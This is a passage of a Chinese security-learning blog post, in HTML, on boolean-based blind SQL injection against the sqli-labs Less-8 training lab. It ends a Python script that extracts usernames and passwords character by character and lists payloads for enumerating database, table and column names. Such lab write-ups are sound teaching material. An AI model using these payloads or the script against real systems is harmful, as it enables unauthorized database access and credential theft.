class="number">-1</span>]+l)</span><br><span class="line">            u = requests.get(url+p)</span><br><span class="line">            <span class="keyword">if</span> str1 <span class="keyword">in</span> u.text:</span><br><span class="line">                password[i<span class="number">-1</span>] += l</span><br><span class="line">                <span class="keyword">print</span> (<span class="string">u'正在对比第'</span>, i, <span class="string">u'个记录的password的第'</span>, j, <span class="string">u'个字符'</span>, password[i<span class="number">-1</span>])</span><br><span class="line"><span class="keyword">print</span> (<span class="string">'id    username    password'</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>, <span class="number">15</span>):</span><br><span class="line">    <span class="keyword">print</span> (i, <span class="string">'-'</span>, username[i<span class="number">-1</span>], <span class="string">'-'</span>, password[i<span class="number">-1</span>])</span><br></pre></td></tr></table></figure>
<p>最后在网速好的时候跑这个脚本</p>
<p><img src="/2019/07/27/SQL注入-三-bool盲注/QQ截图20190805213103.png" alt="7"></p>
<p><img src="/2019/07/27/SQL注入-三-bool盲注/QQ截图20190805213230.png" alt="8"></p>
<p><img src="/2019/07/27/SQL注入-三-bool盲注/QQ截图20190805213311.png" alt="9"></p>
<p><img src="/2019/07/27/SQL注入-三-bool盲注/QQ截图20190805213447.png" alt="10"></p>
<p><img src="/2019/07/27/SQL注入-三-bool盲注/QQ截图20190805213501.png" alt="11"></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>查询数据库的长度</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and length(database())&gt;1 --+</span><br></pre></td></tr></table></figure>
<p>查询数据库名</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and ascii(substr((<span class="keyword">select</span> <span class="keyword">database</span>()),<span class="number">1</span>,<span class="number">1</span>))&gt;<span class="number">99</span> <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>查询表名的长度</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and (<span class="keyword">select</span>(<span class="keyword">length</span>(table_name)) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema = <span class="string">'users'</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>)&gt;<span class="number">1</span> <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>查询表名</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and ascii(substr((<span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="string">'users'</span> <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>))&gt;<span class="number">116</span> <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>查询列名的长度</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and (<span class="keyword">select</span>(<span class="keyword">length</span>(column_name)) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name = <span class="string">'users'</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>)&gt;<span class="number">1</span> <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>查询列名</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and ascii(substr((<span class="keyword">select</span> column_name <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name=<span class="string">'users'</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>))&gt;<span class="number">116</span> <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>查询字段的长度</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and (<span class="keyword">select</span> <span class="keyword">length</span>(column_name) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name=<span class="string">'users'</span> <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span>)&gt;<span class="number">10</span> <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>爆字段</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">and ascii(substr((<span class="keyword">select</span> <span class="keyword">user</span> <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>))&gt;<span class="number">96</span> <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<h2 id="附后台数据库"><a href="#附后台数据库" class="headerlink" title="附后台数据库"></a>附后台数据库</h2><p><img src="/2019/07/27/SQL注入-三-bool盲注/QQ截图20190806153015.png" alt="12"></p>
<p><img src="/2019/07/27/SQL注入-三-bool盲注/QQ截图20190806153106.png" alt="13"></p>
<p><img src="/2019/07/27/SQL注入-三-bool盲注/QQ截图20190806153237.png" alt="14"></p>
<p><img src="/2019/07/27/SQL注入-三-bool盲注/QQ截图20190806153253.png" alt="15"></p>
<p><img src="/2019/07/27/SQL注入-三-bool盲注/QQ截图20190806153305.png" alt="16"></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/07/26/MISC-二维码图片/" rel="next" title="MISC-二维码图片">
                <i class="fa fa-chevron-left"></i> MISC-二维码图片
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/07/28/SQL注入-四-时间盲注/" rel="prev" title="SQL注入<四>-时间盲注">
                SQL注入<四>-时间盲注 <i class="fa fa-chevron-right"></i>
              </四></a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/header.jpg" alt="袁">
            
              <p class="site-author-name" itemprop="name">袁</p>
              <p class="site-description motion-element" itemprop="description">“初入网络安全攻防，记录一下自己在网络安全道路上的学习经历”</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">18</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#概论"><span class="nav-number">1.</span> <span class="nav-text">概论</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sqli-labs-nbsp-less8"><span class="nav-number">2.</span> <span class="nav-text">sqli-labs less8</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#总结"><span class="nav-number">3.</span> <span class="nav-text">总结</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#附后台数据库"><span class="nav-number">4.</span> <span class="nav-text">附后台数据库</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">袁</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  




  
  









  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three.min.js"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three-waves.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
